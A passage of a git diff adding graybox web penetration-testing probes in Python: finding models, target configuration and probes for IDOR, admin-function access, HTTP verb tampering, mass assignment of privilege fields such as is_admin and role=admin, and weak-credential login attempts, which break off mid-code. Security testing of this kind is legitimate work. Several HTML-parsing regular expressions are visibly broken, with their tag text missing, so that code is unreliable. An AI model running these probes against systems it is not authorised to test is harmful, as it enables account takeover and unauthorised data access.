e.g. "PT-A01-01" + title: str + status: str # "vulnerable" | "not_vulnerable" | "inconclusive" + severity: str # "CRITICAL" | "HIGH" | "MEDIUM" | "LOW" | "INFO" + owasp: str # e.g. "A01:2021" + cwe: list[str] = field(default_factory=list) # e.g. ["CWE-639", "CWE-862"] + attack: list[str] = field(default_factory=list) # MITRE ATT&CK IDs e.g. ["T1078"] + evidence: list[str] = field(default_factory=list) # ["endpoint=http://...", "status=200"] + evidence_artifacts: list[GrayboxEvidenceArtifact | dict] = field(default_factory=list) + replay_steps: list[str] = field(default_factory=list) # reproducibility steps + remediation: str = "" + error: str | None = None # non-None if probe had an error + cvss_score: float | None = None + cvss_vector: str = "" + + @classmethod + def from_dict(cls, payload: dict[str, Any]) -> "GrayboxFinding": + """Compatibility-safe constructor for persisted finding dicts.""" + if not isinstance(payload, dict): + raise TypeError("GrayboxFinding payload must be a dict") + data = {k: v for k, v in payload.items() if k in cls.__dataclass_fields__} + data["evidence_artifacts"] = [ + GrayboxEvidenceArtifact.from_value(item) + for item in data.get("evidence_artifacts", []) or [] + ] + return cls(**data) + + def to_dict(self) -> dict[str, Any]: + """JSON-safe serialization.""" + payload = asdict(self) + payload["evidence_artifacts"] = [ + GrayboxEvidenceArtifact.from_value(item).to_dict() + for item in self.evidence_artifacts + ] + return payload + + def _normalized_evidence_artifacts(self) -> list[GrayboxEvidenceArtifact]: + return [GrayboxEvidenceArtifact.from_value(item) for item in self.evidence_artifacts] + + def _flat_evidence_summary(self) -> str: + evidence_lines = [line for line in self.evidence if isinstance(line, str) and line] + if evidence_lines: + return "; ".join(evidence_lines) + artifact_summaries = [ + artifact.summary for artifact in self._normalized_evidence_artifacts() + if artifact.summary + ] + return "; ".join(artifact_summaries) + + def to_flat_finding(self, port: int, protocol: str, probe_name: str) -> dict: + """ + Normalize to the unified flat finding dict schema used in PassReport.findings. + + Converts structured graybox fields to the common schema that + _compute_risk_and_findings() produces for all finding types. + """ + import hashlib + canon_title = self.title.lower().strip() + cwe_joined = ", ".join(self.cwe) + cwe_canonical = ", ".join(sorted({item.strip() for item in self.cwe if isinstance(item, str) and item.strip()})) + id_input = f"{port}:{probe_name}:{cwe_canonical}:{canon_title}" + finding_id = hashlib.sha256(id_input.encode()).hexdigest()[:16] + + # Map status -> confidence and effective severity + confidence_map = { + "vulnerable": "certain", + "not_vulnerable": "firm", + "inconclusive": "tentative", + } + # not_vulnerable findings contribute zero to risk score — + # override severity to INFO so they don't inflate finding_counts + effective_severity = "INFO" if self.status == "not_vulnerable" else self.severity.upper() + + return { + "finding_id": finding_id, + "probe_type": "graybox", + "severity": effective_severity, + "title": self.title, + "description": f"Scenario {self.scenario_id}: {self.title}", + "owasp_id": self.owasp, + "cwe_id": cwe_joined, + "evidence": self._flat_evidence_summary(), + "evidence_artifacts": [ + artifact.to_dict() for artifact in self._normalized_evidence_artifacts() + ], + "remediation": self.remediation, + "confidence": confidence_map.get(self.status, "tentative"), + "port": port, + "protocol": protocol, + "probe": probe_name, + "category": "graybox", + # graybox-only fields + "scenario_id": self.scenario_id, + "status": self.status, + "replay_steps": list(self.replay_steps), + "attack_ids": list(self.attack), + "cvss_score": self.cvss_score, + "cvss_vector": self.cvss_vector, + } + + @classmethod + def flat_from_dict(cls, payload: dict[str, Any], port: int, protocol: str, probe_name: str) -> dict[str, Any]: + """Normalize a persisted graybox finding dict into the flat report contract.""" + return cls.from_dict(payload).to_flat_finding(port, protocol, probe_name) diff --git a/extensions/business/cybersec/red_mesh/graybox/models/__init__.py b/extensions/business/cybersec/red_mesh/graybox/models/__init__.py new file mode 100644 index 00000000..4982d600 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/models/__init__.py @@ -0,0 +1,45 @@ +from .runtime import ( + DiscoveryResult, + GrayboxAuthState, + GrayboxCredential, + GrayboxCredentialSet, + GrayboxProbeDefinition, + GrayboxProbeContext, + GrayboxProbeRunResult, +) +from .target_config import ( + AccessControlConfig, + AdminEndpoint, + BusinessLogicConfig, + COMMON_CSRF_FIELDS, + DiscoveryConfig, + GrayboxTargetConfig, + IdorEndpoint, + InjectionConfig, + MisconfigConfig, + RecordEndpoint, + SsrfEndpoint, + WorkflowEndpoint, +) + +__all__ = [ + "AccessControlConfig", + "AdminEndpoint", + "BusinessLogicConfig", + "COMMON_CSRF_FIELDS", + "DiscoveryConfig", + "DiscoveryResult", + "GrayboxAuthState", + "GrayboxCredential", + "GrayboxCredentialSet", + "GrayboxProbeDefinition", + "GrayboxProbeContext", + "GrayboxProbeRunResult", + "GrayboxTargetConfig", + "IdorEndpoint", + "InjectionConfig", + "MisconfigConfig", + "RecordEndpoint", + "SsrfEndpoint", + "WorkflowEndpoint", +] diff --git a/extensions/business/cybersec/red_mesh/graybox/models/runtime.py b/extensions/business/cybersec/red_mesh/graybox/models/runtime.py new file mode 100644 index 00000000..469ad32a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/models/runtime.py @@ -0,0 +1,122 @@ +from __future__ import annotations + +from dataclasses import dataclass, field + + +@dataclass(frozen=True) +class GrayboxCredential: + username: str = "" + password: str = "" + + @property + def is_configured(self) -> bool: + return bool(self.username) + + def to_dict(self) -> dict: + return { + "username": self.username, + "password": self.password, + } + + +@dataclass(frozen=True) +class GrayboxCredentialSet: + official: GrayboxCredential + regular: GrayboxCredential | None = None + weak_candidates: list[str] = field(default_factory=list) + max_weak_attempts: int = 5 + + @classmethod + def from_job_config(cls, job_config) -> GrayboxCredentialSet: + regular = None + if getattr(job_config, "regular_username", ""): + regular = GrayboxCredential( + username=getattr(job_config, "regular_username", "") or "", + password=getattr(job_config, "regular_password", "") or "", + ) + return cls( + official=GrayboxCredential( + username=getattr(job_config, "official_username", "") or "", + password=getattr(job_config, "official_password", "") or "", + ), + regular=regular, + weak_candidates=list(getattr(job_config, "weak_candidates", None) or []), + max_weak_attempts=int(getattr(job_config, "max_weak_attempts", 5) or 5), + ) + + +@dataclass(frozen=True) +class DiscoveryResult: + routes: list[str] = field(default_factory=list) + forms: list[str] = field(default_factory=list) + + def to_tuple(self) -> tuple[list[str], list[str]]: + return self.routes, self.forms + + +@dataclass(frozen=True) +class GrayboxProbeContext: + target_url: str + auth_manager: object + target_config: object + safety: object + discovered_routes: list[str] = field(default_factory=list) + discovered_forms: list[str] = field(default_factory=list) + regular_username: str = "" + allow_stateful: bool = False + + def to_kwargs(self) -> dict: + return { + "target_url": self.target_url, + "auth_manager": self.auth_manager, + "target_config": self.target_config, + "safety": self.safety, + "discovered_routes": list(self.discovered_routes), + "discovered_forms": list(self.discovered_forms), + "regular_username": self.regular_username, + "allow_stateful": self.allow_stateful, + } + + +@dataclass(frozen=True) +class GrayboxAuthState: + created_at: float = 0.0 + refresh_count: int = 0 + official_authenticated: bool = False + regular_authenticated: bool = False + auth_errors: tuple[str, ...] = () + + @property + def has_authenticated_session(self) -> bool: + return self.official_authenticated + + +@dataclass(frozen=True) +class GrayboxProbeDefinition: + key: str + cls_path: str + + @classmethod + def from_entry(cls, entry) -> "GrayboxProbeDefinition": + if isinstance(entry, GrayboxProbeDefinition): + return entry + return cls( + key=entry["key"], + cls_path=entry["cls"], + ) + + +@dataclass(frozen=True) +class GrayboxProbeRunResult: + findings: list[object] = field(default_factory=list) + artifacts: list[object] = field(default_factory=list) + outcome: str = "completed" + + @classmethod + def from_value(cls, value, default_outcome: str = "completed") -> "GrayboxProbeRunResult": + if isinstance(value, GrayboxProbeRunResult): + return value + return cls( + findings=list(value or []), + outcome=default_outcome, + ) diff --git a/extensions/business/cybersec/red_mesh/graybox/models/target_config.py b/extensions/business/cybersec/red_mesh/graybox/models/target_config.py new file mode 100644 index 00000000..803716ad --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/models/target_config.py @@ -0,0 +1,229 @@ +""" +Application-specific endpoint mapping for graybox probes. + +Sectioned by probe category (E4). Each probe reads only its section. +Endpoint entries use typed dataclasses — typos in keys raise at +construction time, not at runtime deep inside a probe. + +Passed to the worker via JobConfig.target_config (serialized dict). +""" + +from __future__ import annotations + +from dataclasses import dataclass, asdict, field +from typing import Any + + +# Common CSRF field names across frameworks (C5) +COMMON_CSRF_FIELDS = [ + "csrfmiddlewaretoken", # Django + "csrf_token", # Flask / WTForms + "authenticity_token", # Rails + "_csrf", # Spring Security + "_token", # Laravel +] + + +# ── Typed endpoint configs (E4) ────────────────────────────────────────── + +@dataclass(frozen=True) +class IdorEndpoint: + """Endpoint for IDOR/BOLA testing (PT-A01-01).""" + path: str # e.g. "/api/records/{id}/" + test_ids: list[int] = field(default_factory=lambda: [1, 2]) + owner_field: str = "owner" + id_param: str = "id" + + @classmethod + def from_dict(cls, d: dict) -> IdorEndpoint: + return cls( + path=d["path"], + test_ids=d.get("test_ids", [1, 2]), + owner_field=d.get("owner_field", "owner"), + id_param=d.get("id_param", "id"), + ) + + +@dataclass(frozen=True) +class AdminEndpoint: + """Endpoint for privilege escalation testing (PT-A01-02).""" + path: str # e.g. "/api/admin/export-users/" + method: str = "GET" + content_markers: list[str] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> AdminEndpoint: + return cls( + path=d["path"], + method=d.get("method", "GET"), + content_markers=d.get("content_markers", []), + ) + + +@dataclass(frozen=True) +class WorkflowEndpoint: + """Endpoint for business logic testing (PT-A06-01).""" + path: str # e.g. "/api/records/{id}/force-pay/" + method: str = "POST" + expected_guard: str = "" + + @classmethod + def from_dict(cls, d: dict) -> WorkflowEndpoint: + return cls( + path=d["path"], + method=d.get("method", "POST"), + expected_guard=d.get("expected_guard", ""), + ) + + +@dataclass(frozen=True) +class SsrfEndpoint: + """Endpoint for SSRF testing (PT-API7-01).""" + path: str # e.g. "api/fetch/" + param: str = "url" # query param that accepts a URL + + @classmethod + def from_dict(cls, d: dict) -> SsrfEndpoint: + return cls(path=d["path"], param=d.get("param", "url")) + + +# ── Probe-sectioned config (E4) ───────────────────────────────────────── + +@dataclass(frozen=True) +class AccessControlConfig: + """Config for access control probes (A01).""" + idor_endpoints: list[IdorEndpoint] = field(default_factory=list) + admin_endpoints: list[AdminEndpoint] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> AccessControlConfig: + return cls( + idor_endpoints=[IdorEndpoint.from_dict(e) for e in d.get("idor_endpoints", [])], + admin_endpoints=[AdminEndpoint.from_dict(e) for e in d.get("admin_endpoints", [])], + ) + + +@dataclass(frozen=True) +class MisconfigConfig: + """Config for misconfiguration probes (A02).""" + debug_paths: list[str] = field(default_factory=lambda: [ + "/debug/config/", "/.env", "/actuator/env", "/server-info", + "/actuator", "/server-status", + ]) + + @classmethod + def from_dict(cls, d: dict) -> MisconfigConfig: + return cls(debug_paths=d.get("debug_paths", cls.__dataclass_fields__["debug_paths"].default_factory())) + + +@dataclass(frozen=True) +class InjectionConfig: + """Config for injection probes (A03/A05/API7).""" + ssrf_endpoints: list[SsrfEndpoint] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> InjectionConfig: + return cls( + ssrf_endpoints=[SsrfEndpoint.from_dict(e) for e in d.get("ssrf_endpoints", [])], + ) + + +@dataclass(frozen=True) +class RecordEndpoint: + """Endpoint for business logic validation testing (PT-A06-02).""" + path: str # e.g. "/records/{id}/" + method: str = "POST" + amount_field: str = "amount" # field name for monetary amount + status_field: str = "status" # field name for status/state + valid_transitions: dict[str, list[str]] = field(default_factory=dict) # e.g. {"draft": ["submitted"]} + + @classmethod + def from_dict(cls, d: dict) -> RecordEndpoint: + return cls( + path=d["path"], + method=d.get("method", "POST"), + amount_field=d.get("amount_field", "amount"), + status_field=d.get("status_field", "status"), + valid_transitions=d.get("valid_transitions", {}), + ) + + +@dataclass(frozen=True) +class BusinessLogicConfig: + """Config for business logic probes (A06).""" + workflow_endpoints: list[WorkflowEndpoint] = field(default_factory=list) + record_endpoints: list[RecordEndpoint] = field(default_factory=list) + + @classmethod + def from_dict(cls, d: dict) -> BusinessLogicConfig: + return cls( + workflow_endpoints=[WorkflowEndpoint.from_dict(e) for e in d.get("workflow_endpoints", [])], + record_endpoints=[RecordEndpoint.from_dict(e) for e in d.get("record_endpoints", [])], + ) + + +@dataclass(frozen=True) +class DiscoveryConfig: + """Config for route/form discovery.""" + scope_prefix: str = "" # e.g. "/api/" — only crawl under this path + max_pages: int = 50 # max pages to crawl + max_depth: int = 3 # max link-follow depth + + @classmethod + def from_dict(cls, d: dict) -> DiscoveryConfig: + return cls( + scope_prefix=d.get("scope_prefix", ""), + max_pages=d.get("max_pages", 50), + max_depth=d.get("max_depth", 3), + ) + + +# ── Main config ───────────────────────────────────────────────────────── + +@dataclass(frozen=True) +class GrayboxTargetConfig: + """ + Application-specific endpoint mapping for graybox probes. + + Sectioned by probe category. Each probe reads only its section, + and adding a new probe's config doesn't bloat unrelated sections. + Endpoint entries use typed dataclasses — typos in keys raise at + construction time, not at runtime deep inside a probe. + + Passed to the worker via JobConfig.target_config (serialized dict). + """ + # Per-probe sections (E4) + access_control: AccessControlConfig = field(default_factory=AccessControlConfig) + misconfig: MisconfigConfig = field(default_factory=MisconfigConfig) + injection: InjectionConfig = field(default_factory=InjectionConfig) + business_logic: BusinessLogicConfig = field(default_factory=BusinessLogicConfig) + discovery: DiscoveryConfig = field(default_factory=DiscoveryConfig) + + # Login endpoint configuration (shared across probes) + login_path: str = "/auth/login/" + logout_path: str = "/auth/logout/" + password_reset_path: str = "" # e.g. "/auth/password-reset/request/" + password_reset_confirm_path: str = "" # e.g. "/auth/password-reset/confirm/" + username_field: str = "username" + password_field: str = "password" + csrf_field: str = "" # empty = auto-detect from COMMON_CSRF_FIELDS + + def to_dict(self) -> dict: + return {k: v for k, v in asdict(self).items() if v is not None} + + @classmethod + def from_dict(cls, d: dict) -> GrayboxTargetConfig: + return cls( + access_control=AccessControlConfig.from_dict(d.get("access_control", {})), + misconfig=MisconfigConfig.from_dict(d.get("misconfig", {})), + injection=InjectionConfig.from_dict(d.get("injection", {})), + business_logic=BusinessLogicConfig.from_dict(d.get("business_logic", {})), + discovery=DiscoveryConfig.from_dict(d.get("discovery", {})), + login_path=d.get("login_path", "/auth/login/"), + logout_path=d.get("logout_path", "/auth/logout/"), + password_reset_path=d.get("password_reset_path", ""), + password_reset_confirm_path=d.get("password_reset_confirm_path", ""), + username_field=d.get("username_field", "username"), + password_field=d.get("password_field", "password"), + csrf_field=d.get("csrf_field", ""), + ) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/__init__.py b/extensions/business/cybersec/red_mesh/graybox/probes/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/access_control.py b/extensions/business/cybersec/red_mesh/graybox/probes/access_control.py new file mode 100644 index 00000000..c6448df4 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/access_control.py @@ -0,0 +1,450 @@ +""" +Access control probes — A01 IDOR + privilege escalation + verb tampering + mass assignment. +""" + +import re + +from .base import ProbeBase +from ..findings import GrayboxFinding + + +class AccessControlProbes(ProbeBase): + """ + PT-A01-01 IDOR/BOLA, PT-A01-02 function-level authorization bypass, + PT-A01-03 HTTP verb tampering, PT-A04-01 mass assignment. + """ + + requires_auth = True + requires_regular_session = True + is_stateful = False + + def run(self): + if self.auth.regular_session: + self.run_safe("idor", self._test_idor) + if self.auth.regular_session: + self.run_safe("privilege_escalation", self._test_privilege_esc) + if self.auth.regular_session: + self.run_safe("verb_tampering", self._test_verb_tampering) + if self.auth.regular_session and self._allow_stateful: + self.run_safe("mass_assignment", self._test_mass_assignment) + elif self.auth.regular_session: + self.findings.append(GrayboxFinding( + scenario_id="PT-A04-01", + title="Mass assignment probe skipped: stateful probes disabled", + status="inconclusive", + severity="INFO", + owasp="A04:2021", + evidence=["stateful_probes_disabled=True", + "reason=mass_assignment_modifies_target_data"], + )) + return self.findings + + def _test_idor(self): + """ + Test IDOR on configured or auto-detected endpoints. + + Emits exactly ONE finding per scenario. Accumulates results across + all endpoints, then emits vulnerable (worst-case wins) or not_vulnerable. + """ + endpoints = self.target_config.access_control.idor_endpoints + if not endpoints: + endpoints = self._infer_idor_endpoints() + if not endpoints: + return + + if not self.regular_username: + return + + vulnerable_evidence = None + endpoints_tested = 0 + + for ep in endpoints: + self.safety.throttle() + result = self._test_single_idor(ep) + endpoints_tested += 1 + if result: + vulnerable_evidence = result + break + + if vulnerable_evidence: + owner, url, path = vulnerable_evidence + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-01", + title="Object-level authorization bypass", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639", "CWE-862"], + attack=["T1078"], + evidence=[ + f"endpoint={url}", + "response_status=200", + f"owner_field={owner}", + f"authenticated_user={self.regular_username}", + ], + replay_steps=[ + "Log in as regular user.", + f"Request GET {path}.", + "Observe owner field not matching logged-in user.", + ], + remediation="Authorize object access using both role and ownership checks server-side.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-01", + title="Object-level authorization — no bypass detected", + status="not_vulnerable", + severity="INFO", + owasp="A01:2021", + evidence=[f"endpoints_tested={endpoints_tested}"], + )) + + def _test_single_idor(self, ep): + """Test one IDOR endpoint. Returns (owner, url, path) on hit, None on miss.""" + path_tpl = ep.path + for test_id in ep.test_ids: + path = path_tpl.replace("{id}", str(test_id)) + url = self.target_url + path + resp = self.auth.regular_session.get(url, timeout=10) + if resp.status_code != 200: + continue + ct = resp.headers.get("content-type", "") + if not ct.startswith("application/json"): + continue + try: + body = resp.json() + except ValueError: + continue + owner = body.get(ep.owner_field, "") + if owner and owner != self.regular_username: + return (owner, url, path) + return None + + def _infer_idor_endpoints(self): + """Auto-detect potential IDOR endpoints from discovered routes.""" + from ..models.target_config import IdorEndpoint + pattern = re.compile(r"^(/(?:api/)?[\w-]+/)\d+/?$") + endpoints = [] + for route in self.discovered_routes: + m = pattern.match(route) + if m: + endpoints.append(IdorEndpoint( + path=m.group(1) + "{id}/", + test_ids=[1, 2], + owner_field="owner", + )) + return endpoints + + def _test_privilege_esc(self): + """Test admin endpoints accessible as regular user.""" + endpoints = self.target_config.access_control.admin_endpoints + if not endpoints: + return + for ep in endpoints: + self.safety.throttle() + method = ep.method.upper() + url = self.target_url + ep.path + if method == "GET": + resp = self.auth.regular_session.get(url, timeout=10) + else: + continue # only GET for read-only probes + + if resp.status_code == 200: + body_lower = resp.text.lower() + denial_markers = ["access denied", "permission denied", "forbidden", + "not authorized", "unauthorized", "403"] + has_denial = any(m in body_lower for m in denial_markers) + + has_content = any(m in resp.text for m in ep.content_markers) if ep.content_markers else False + + if has_denial: + continue + + if has_content: + finding_status = "vulnerable" + finding_severity = "HIGH" + else: + finding_status = "inconclusive" + finding_severity = "LOW" + + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-02", + title="Function-level authorization bypass", + status=finding_status, + severity=finding_severity, + owasp="A01:2021", + cwe=["CWE-862"], + attack=["T1078"], + evidence=[ + f"endpoint={url}", + "response_status=200", + f"content_verified={has_content}", + ], + replay_steps=[ + "Log in as regular user.", + f"Request {method} {ep.path}.", + "Confirm privileged data is returned.", + ], + remediation="Require admin role and deny by default for all privileged functions.", + )) + + def _test_verb_tampering(self): + """ + PT-A01-03: test if access controls can be bypassed by changing HTTP method. + + Takes admin endpoints that should deny regular users and retries with + alternative HTTP methods (PUT, PATCH, DELETE). Some frameworks only + enforce authorization on GET/POST but pass through other verbs. + """ + endpoints = self.target_config.access_control.admin_endpoints + if not endpoints: + return + + alternative_methods = ["PUT", "PATCH", "DELETE", "OPTIONS"] + denial_markers = ["access denied", "permission denied", "forbidden", + "not authorized", "unauthorized", "403"] + + tested = 0 + bypass_evidence = [] + + for ep in endpoints: + # First, confirm the endpoint denies regular user via its normal method. + self.safety.throttle() + url = self.target_url + ep.path + try: + baseline = self.auth.regular_session.request( + ep.method.upper(), url, timeout=10, + ) + except Exception: + continue + + # Only test verb tampering if the baseline is denied (403/401/302-to-login) + baseline_denied = baseline.status_code in (401, 403) + if not baseline_denied and baseline.status_code == 200: + body_lower = baseline.text.lower() + baseline_denied = any(m in body_lower for m in denial_markers) + if not baseline_denied and baseline.status_code in (301, 302): + location = baseline.headers.get("Location", "").lower() + baseline_denied = "login" in location + if not baseline_denied: + continue # endpoint already accessible — not a verb tampering target + + # Try alternative methods + for method in alternative_methods: + self.safety.throttle() + try: + resp = self.auth.regular_session.request(method, url, timeout=10) + except Exception: + continue + tested += 1 + + if resp.status_code < 400 and resp.status_code not in (301, 302): + body_lower = resp.text.lower() + if not any(m in body_lower for m in denial_markers): + bypass_evidence.append( + f"endpoint={ep.path}; denied_method={ep.method}; " + f"accepted_method={method}; status={resp.status_code}" + ) + break # one bypass per endpoint is enough + + if bypass_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-03", + title="HTTP verb tampering bypass", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-650"], + attack=["T1190"], + evidence=bypass_evidence, + replay_steps=[ + "Log in as regular user.", + "Send request to admin endpoint using alternative HTTP method.", + "Observe access granted despite method-based restriction.", + ], + remediation="Enforce authorization checks regardless of HTTP method. " + "Deny all methods by default and explicitly allow required ones.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-03", + title="HTTP verb tampering — no bypass detected", + status="not_vulnerable", + severity="INFO", + owasp="A01:2021", + evidence=[f"endpoints_tested={len(endpoints)}", f"methods_tested={tested}"], + )) + + def _test_mass_assignment(self): + """ + PT-A04-01: test if the server binds unauthorized privilege fields. + + Submits forms as regular user with injected privilege fields + (is_admin, role, is_staff, etc.) and checks if the server accepts + and persists them. Stateful — gated behind allow_stateful. + """ + # Collect testable endpoints: discovered forms + configured record endpoints + skip_paths = {self.target_config.login_path, self.target_config.logout_path} + form_paths = [f for f in self.discovered_forms if f not in skip_paths] + + # Also add configured record endpoints (these accept form POSTs) + for ep in self.target_config.business_logic.record_endpoints: + path = ep.path + if "{id}" in path: + idor_ids = [1, 2] + for iep in self.target_config.access_control.idor_endpoints: + if iep.test_ids: + idor_ids = iep.test_ids + break + path = path.replace("{id}", str(idor_ids[0])) + if path not in skip_paths: + form_paths.append(path) + + if not form_paths: + return + + # Privilege escalation fields to inject + priv_fields = { + "is_admin": "true", + "is_staff": "true", + "is_superuser": "true", + "role": "admin", + "admin": "true", + "user_type": "admin", + "privilege_level": "10", + "group": "administrators", + } + + tested = 0 + accepted_evidence = [] + + for form_path in form_paths[:5]: # cap at 5 forms + self.safety.throttle() + url = self.target_url + form_path + + # GET the form to extract existing fields + CSRF token + try: + page = self.auth.regular_session.get(url, timeout=10) + except Exception: + continue + if page.status_code != 200: + continue + + # Extract form fields + form_fields = {} + for tag in re.finditer(r']*)>', page.text, re.I): + attrs = tag.group(1) + name_m = re.search(r'name=["\']([^"\']+)', attrs) + val_m = re.search(r'value=["\']([^"\']*)', attrs) + if name_m: + form_fields[name_m.group(1)] = val_m.group(1) if val_m else "" + for m in re.finditer( + r']+name=["\']([^"\']+)["\'][^>]*>(.*?)', + page.text, re.I | re.DOTALL, + ): + form_fields[m.group(1)] = m.group(2).strip() + for sel in re.finditer( + r']+name=["\']([^"\']+)["\'][^>]*>(.*?)', + page.text, re.I | re.DOTALL, + ): + sel_name = sel.group(1) + sel_body = sel.group(2) + opt = re.search(r']*selected[^>]*value=["\']([^"\']+)', sel_body, re.I) + if not opt: + opt = re.search(r']*value=["\']([^"\']+)["\'][^>]*selected', sel_body, re.I) + if opt: + form_fields[sel_name] = opt.group(1) + + if not form_fields: + continue + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + # Build payload: existing fields + injected privilege fields + payload = dict(form_fields) + # Remove CSRF field from form_fields (will add fresh one) + if csrf_field and csrf_field in payload: + del payload[csrf_field] + payload.update(priv_fields) + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + + headers = {"Referer": url} + if csrf_token: + headers["X-CSRFToken"] = csrf_token + + self.safety.throttle() + try: + resp = self.auth.regular_session.post( + url, data=payload, headers=headers, + timeout=10, allow_redirects=False, + ) + except Exception: + continue + tested += 1 + + # Check if server accepted the request + accepted = resp.status_code in (200, 301, 302) + if accepted and resp.status_code == 200: + body_lower = resp.text.lower() + error_markers = ["error", "invalid", "not allowed", "forbidden", + "unknown field", "unexpected"] + if any(m in body_lower for m in error_markers): + accepted = False + + if not accepted: + continue + + # Verify: GET the page again and check if privilege fields are reflected + self.safety.throttle() + try: + verify = self.auth.regular_session.get(url, timeout=10) + except Exception: + continue + + persisted_fields = [] + verify_lower = verify.text.lower() + for field_name, field_value in priv_fields.items(): + # Check for field=value in response (JSON or HTML attribute) + if (f'"{field_name}": "{field_value}"' in verify_lower or + f'"{field_name}":"{field_value}"' in verify_lower or + f"value=\"{field_value}\"" in verify.text and field_name in verify.text or + f'name="{field_name}"' in verify.text and f'value="{field_value}"' in verify.text): + persisted_fields.append(field_name) + + if persisted_fields: + accepted_evidence.append( + f"endpoint={form_path}; persisted_fields={','.join(persisted_fields)}" + ) + + if accepted_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A04-01", + title="Mass assignment — privilege field accepted", + status="vulnerable", + severity="HIGH", + owasp="A04:2021", + cwe=["CWE-915"], + attack=["T1078"], + evidence=accepted_evidence, + replay_steps=[ + "Log in as regular user.", + "Submit form with additional privilege fields (is_admin, role, etc.).", + "Observe server persists the injected privilege fields.", + ], + remediation="Use explicit field allowlists in form/API binding. " + "Never bind user input directly to model attributes. " + "Django: use ModelForm.Meta.fields. Rails: use strong_parameters.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A04-01", + title="Mass assignment — no privilege escalation detected", + status="not_vulnerable", + severity="INFO", + owasp="A04:2021", + evidence=[f"forms_tested={tested}"], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/base.py b/extensions/business/cybersec/red_mesh/graybox/probes/base.py new file mode 100644 index 00000000..8e0fbd50 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/base.py @@ -0,0 +1,85 @@ +""" +Base class for graybox probe modules. + +Provides shared utilities, error recovery, and capability declarations. +Probes receive fully initialized collaborators — they don't manage +sessions or credentials themselves. +""" + +import requests + +from ..findings import GrayboxFinding +from ..models import GrayboxProbeContext, GrayboxProbeRunResult + + +class ProbeBase: + """ + Shared utilities for graybox probe modules. + + Probes receive fully initialized collaborators — they don't manage + sessions or credentials themselves. + + Capability declarations: subclasses set class-level attributes to + declare their requirements. The worker introspects these after loading + the class from the registry. No capability flags in the registry. + """ + + # Capability declarations — override in subclasses. + requires_auth: bool = True + requires_regular_session: bool = False + is_stateful: bool = False + + def __init__(self, target_url, auth_manager, target_config, safety, + discovered_routes=None, discovered_forms=None, + regular_username="", allow_stateful=False): + self.target_url = target_url.rstrip("/") + self.auth = auth_manager + self.target_config = target_config + self.safety = safety + self.discovered_routes = discovered_routes or [] + self.discovered_forms = discovered_forms or [] + self.regular_username = regular_username + self._allow_stateful = allow_stateful + self.findings: list[GrayboxFinding] = [] + + @classmethod + def from_context(cls, context: GrayboxProbeContext): + """Build a probe from a typed worker-provided context.""" + return cls(**context.to_kwargs()) + + def run_safe(self, probe_name, probe_fn): + """ + Run a probe with error recovery. + + Does NOT call ensure_sessions — the worker is responsible for session + lifecycle. Probes just use self.auth.official_session / + self.auth.regular_session as-is. + """ + try: + probe_fn() + except requests.exceptions.ConnectionError: + self._record_error(probe_name, "target_unreachable") + except requests.exceptions.Timeout: + self._record_error(probe_name, "request_timeout") + except Exception as exc: + self._record_error(probe_name, self.safety.sanitize_error(str(exc))) + + def build_result(self, outcome: str = "completed", artifacts=None) -> GrayboxProbeRunResult: + """Return a typed probe result without changing legacy run() contracts.""" + return GrayboxProbeRunResult( + findings=list(self.findings), + artifacts=list(artifacts or []), + outcome=outcome, + ) + + def _record_error(self, probe_name, error_msg): + """Store a non-fatal error as an INFO GrayboxFinding.""" + self.findings.append(GrayboxFinding( + scenario_id=f"ERR-{probe_name}", + title=f"Probe error: {probe_name}", + status="inconclusive", + severity="INFO", + owasp="", + evidence=[f"error={error_msg}"], + error=error_msg, + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/business_logic.py b/extensions/business/cybersec/red_mesh/graybox/probes/business_logic.py new file mode 100644 index 00000000..a80e4c2b --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/business_logic.py @@ -0,0 +1,391 @@ +""" +Business logic probes — A06 workflow bypass + A07 weak auth. +""" + +from .base import ProbeBase +from ..findings import GrayboxFinding + + +class BusinessLogicProbes(ProbeBase): + """ + PT-A06-01: workflow bypass (STATEFUL — requires allow_stateful_probes). + PT-A07-01: weak auth simulation (read-only). + """ + + requires_auth = True + requires_regular_session = True + is_stateful = True + + def run(self): + if self._allow_stateful: + self.run_safe("workflow_bypass", self._test_workflow_bypass) + self.run_safe("validation_bypass", self._test_validation_bypass) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-01", + title="Business logic probes skipped", + status="inconclusive", + severity="INFO", + owasp="A06:2021", + evidence=["stateful_probes_disabled=True"], + )) + return self.findings + + def run_weak_auth(self, candidates, max_attempts): + """ + PT-A07-01 bounded weak-credential simulation. + + Read-only: only tests login, never modifies application state. + Includes lockout detection to abort if target starts blocking. + """ + budget = self.safety.clamp_attempts(max_attempts) + if not candidates: + return self.findings + + lockout_markers = [ + "account locked", "too many attempts", "temporarily blocked", + "account suspended", "try again later", "rate limit", + ] + + attempts = 0 + successes = [] + for cred in candidates[:budget]: + if ":" not in cred: + continue + username, password = cred.split(":", 1) + self.safety.throttle_auth() + session = self.auth.try_credentials(username, password) + attempts += 1 + 